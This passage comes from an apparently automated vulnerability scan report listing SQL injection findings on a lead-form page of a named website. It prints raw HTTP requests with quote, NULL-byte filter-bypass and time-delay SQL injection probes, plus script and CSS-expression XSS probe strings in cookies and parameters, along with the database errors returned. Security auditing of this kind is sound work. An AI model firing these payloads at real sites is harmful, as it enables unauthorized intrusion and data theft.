OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hc14ckqlvdu5533nm5k7pqeh57; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.118. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_398 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_398 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_398 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No%00'&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6798
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1969__Business expansion&attributeId_400=1976__Yes&attributeId_401=1980__$5,0' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No%00''&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.119. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_399%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_399%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_399%5B%5D parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion'&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=583vkpn5idu9k1e8l9t6g0ns91; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.120. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_400 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_400 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_400 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes'&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000 - 9,999&attributeId_402=1989__6-12 Months&attributeId_403=1995__$1,000 - 9,9' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes''&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.121. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_400 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_400 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_400 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes'&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=t4muvknffn020rjnaemi7cu5n5; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

